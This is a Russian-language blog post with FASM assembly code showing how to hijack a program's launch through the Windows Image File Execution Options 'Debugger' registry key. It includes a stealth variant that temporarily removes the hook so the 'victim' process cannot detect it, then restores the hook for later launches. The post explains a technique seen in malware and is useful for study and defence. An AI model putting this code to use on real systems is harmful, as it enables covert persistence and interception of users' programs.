Blog. Just Blog

Работа с Image File Execution Options на Ассемблере

Версия для печати Добавить в Избранное Отправить на E-Mail 17.07.2019 | Категория: Образ мышления: Assembler | Автор: ManHunter
Не так давно я выкладывал статью про использование Image File Execution Options, где обещал провести эксперименты на Ассемблере. Всю теорию про IFEO вы можете прочитать по приведенной ссылке, дублировать я ее тут не буду.

Начнем с установки перехватчика. Тут все просто, создаем ключ в реестре, затем в нем создаем параметр "Debugger" с указанием пути к нашему файлу.
Code (Assembler) : Убрать нумерацию
  1. ; Ключ реестра
  2. victim_key db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\'
  3.            db 'Image File Execution Options\victim.exe',0
  4. ; Путь к нашему отладчику
  5. debug_key  db 'Debugger',0
  6. ...
  7. ...
  8.         invoke  RegCreateKeyEx,HKEY_LOCAL_MACHINE,victim_key,0,0,\
  9.                 REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,0,phkResult,lpdwDisp
  10.         ; Путь к отладчику
  11.         invoke  lstrlen,evil
  12.         invoke  RegSetValueEx,[phkResult],debug_key,0,REG_SZ,evil,eax
  13.         invoke  RegCloseKey,[phkResult]
Удаление перехватчика тоже не должно вызывать сложностей. Можно просто грохнуть параметр "Debugger", это будет правильно в случае с системными приложениями типа браузеров. Для пользовательских приложений лучше удалять соответствующую ветку реестра целиком, чтобы не засорять систему своим мусором:
Code (Assembler) : Убрать нумерацию
  1.         invoke  SHDeleteKey,HKEY_LOCAL_MACHINE,victim_key
Для всех этих операций может потребоваться запуск с правами Администратора, а также при должной настройке может сработать UAC.

При запуске программы-жертвы система запускает отладчик, передавая ему в качестве параметра командной строки полный путь запуска программы. Разобрать командную строку можно самостоятельно или с помощью какого-нибудь готового решения, это уже на ваше усмотрение. Итак, у нас есть путь запуска жертвы. Выполнив все необходимое в отладчике, необходимо запустить жертву, но просто так запустить ее нельзя. При попытке вызвать WinExec, ShellExecute(Ex) и иже с ними мы получим просто новый запуск отладчика. Обойти это поведение можно при помощи функции CreateProcess с флагом DEBUG_PROCESS. Ну логично, чо, мы же взяли на себя функцию отладчика, вот и надо ей соответствовать. Но нельзя просто указать этот флаг в параметрах запуска, придется также реализовать процесс отладки, пусть и в самом примитивном виде.
Code (Assembler) : Убрать нумерацию
  1.         ; Запустить процесс
  2.         invoke  CreateProcess,victim,0,NULL,NULL,NULL,\
  3.                 NORMAL_PRIORITY_CLASS+DEBUG_ONLY_THIS_PROCESS,NULL,NULL,\
  4.                 sinfo,pinfo
  5.         ; Цикл отладчика
  6. @@:
  7.         ; Ожидаем событие от запущенного процесса
  8.         invoke  WaitForDebugEvent,debug_event,INFINITE
  9.         or      eax,eax
  10.         jz      loc_exit
  11.         ; Процесс завершен?
  12.         cmp     [debug_event.dwDebugEventCode],EXIT_PROCESS_DEBUG_EVENT
  13.         je      loc_exit
  14.         ; Продолжаем выполнение программы
  15.         invoke  ContinueDebugEvent,[debug_event.dwProcessId],\
  16.                 [debug_event.dwThreadId],DBG_CONTINUE
  17.         jmp     @b
При завершении дочернего процесса мы завершаем работу и выходим из процесса отладчика. Существенный минус такой реализации перехвата заключается в том, что процесс-жертва может легко обнаружить факт нашего вмешательства при помощи банального IsDebuggerPresent. Еще один минус, что процесс отладчика должен постоянно висеть в памяти до момента окончания работы программы-жертвы, а это дополнительное палево. Как я понимаю, автор зловреда из первоначальной статьи или не осилил написание своего цикла отладчика, или решил не заморачиваться с запуском оригинальных браузеров, чтобы не палиться на отладке. Впрочем, может быть просто на говносайте были размещены какие-то эксплойты, заточенные под Internet Explorer. Сейчас это уже не узнать.

Мне стало интересно, а можно ли сделать так, чтобы и наш отладчик запустился, и жертва об этом ничего не узнала? Подумал, потестировал, в итоге получилось следующее:
Code (Assembler) : Убрать нумерацию
  1.         ; Удалить ключ реестра
  2.         invoke  SHDeleteKey,HKEY_LOCAL_MACHINE,victim_key
  3.  
  4.         ; Запустить процесс обычным способом 
  5.         invoke  CreateProcess,victim,0,NULL,NULL,NULL,\
  6.                 NORMAL_PRIORITY_CLASS,NULL,NULL,sinfo,pinfo
  7.  
  8.         ; Вернуть обратно ключ реестра
  9.         invoke  RegCreateKeyEx,HKEY_LOCAL_MACHINE,victim_key,0,0,\
  10.                 REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,0,phkResult,lpdwDisp
  11.         invoke  lstrlen,evil
  12.         invoke  RegSetValueEx,[phkResult],debug_key,0,REG_SZ,evil,eax
  13.         invoke  RegCloseKey,[phkResult]
При получении управления отладчик первым делом удаляет ключ Debugger из реестра, тем самым "освобождая" жертву. Теперь ее можно запускать любым способом, хоть через WinExec, хоть через CreateProcess без флага отладки. Запустив дочерний процесс, отладчик возвращает ключ отладки обратно в реестр и завершает работу. В памяти не висит ничего лишнего, жертва запущена в обычном режиме, перехватчик для следующих запусков на месте. Цель достигнута.

В приложении примеры программ с исходными текстами для установки классического отладчика и отладчика с альтернативной обработкой.

Примеры программ с исходными текстами (FASM)Примеры программ с исходными текстами (FASM)

Image.File.Execution.Options.Demo.zip (5,561 bytes)


Поделиться ссылкой ВКонтакте
Просмотров: 1633 | Комментариев: 0

Внимание! Статья опубликована больше года назад, информация могла устареть!

Комментарии

Отзывы посетителей сайта о статье
Комментариeв нет

Добавить комментарий

Заполните форму для добавления комментария
Имя*:
Текст комментария (не более 2000 символов)*:

*Все поля обязательны для заполнения.
Комментарии, содержащие рекламу, ненормативную лексику, оскорбления и т.п., а также флуд и сообщения не по теме, будут удаляться. Нарушителям может быть заблокирован доступ к сайту.
Это я :-)
Если программист в девять утра уже на работе, значит он там же и ночевал
Главная страница Web-мастеру и не только Образ мышления: Assembler Мои программы Software Темная сторона Силы Обзоры техники А еще я туда ем! Жизнь в оффлайне Всякая всячина
Карта сайта Ссылки Обратная связь Правила сайта Настройки сайта RSS-канал
Ограничение по возрасту 16+ Материалы, опубликованные на этом сайте, не рекомендуются к просмотру лицам в возрасте до 16 лет без присутствия взрослых.
Метки статей
.NET (27), AJAX (5), Assembler (349), COM (39), CSS (39), Exif (15), FASM (8), Firefox (7), HDD (17), Hello Teddy (9), HTML (48), iconBIT (4), JavaScript (68), MySQL (13), Nikon (19), PDF (9), PHP (119), Samsung (6), SEO (12), Sublime Text (9), TintonLife (4), UGREEN (4), Windows 7 (66), аккумуляторы (22), аксессуары (12), анализаторы файлов (8), архиваторы (5), аттракционы (7), безопасность (55), браузеры (16), бытовая техника (19), варенье (18), ВВЦ (9), ВДНХ (14), видео (20), Воробьевы горы (9), вторые блюда (120), выпечка (27), выставки (116), генератор ПСЧ (10), графика (118), десерты (31), Египет (8), заготовки на зиму (45), закуска (21), закуска к пиву (24), зарядные устройства (23), защита (15), зоопарки (10), игры (36), иконки (22), интерфейс (26), исследование защиты (306), каша (4), клавиатура (7), Коломенское (37), консоль (7), концерты (52), Кузьминки (4), куклы (27), ледяные скульптуры (6), мои программы (68), мониторы (6), музеи (72), мультимедиа (70), мясо (59), напитки (14), ноутбуки (8), обфускация (7), окна (69), оформление сайта (47), парки Москвы (7), песчаные скульптуры (13), плееры (10), подводная съемка (4), поздравления (127), полезные функции (39), прохождения (4), процессы (25), птица (20), путешествия (25), распаковка (22), реверсинг (51), рыба (34), салаты (18), сброс триала (4), сеть (36), система (177), Сокольники (8), соусы (14), супы (14), телефоны (8), Тунис (6), умный дом (12), файлы справки (6), фаст-фуд (18), фестиваль цветов (5), флешки (5), фото (23), хеши (16), числа (8), юмор (12), яйца (17), Яндекс (10)
Вам помог этот сайт?
Сказать спасибо! Поблагодарили 34,343 раза
<< 2024 - АПРЕЛЬ >>
Пн Вт Ср Чт Пт Сб Вс
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30          
Всемирный день настольного тенниса
Нашли на сайте орфографическую ошибку? Выделите ее мышкой и нажмите
Ctrl
+
Enter
Буду очень благодарен, если размеcтите мою кнопочку:
Личный блог ManHunter'а
Valid CSS Valid XHTML 1.0 Transitional Valid mobileOK Basic Valid RSS
Яндекс тИЦ: {YANDEX_TIC} Яндекс ИКС: 380
Сейчас я слушаю
---
Имя:

Сообщение:

Осталось символов: 200

   
-
Наверх
Powered by PCL's Speckled Band Engine 0.2 RC3
© ManHunter / PCL, 2008-2024
При использовании материалов ссылка на сайт обязательна
Время генерации: 0.08 сек. / MySQL: 2 (0.0093 сек.) / Память: 4.5 Mb
Наверх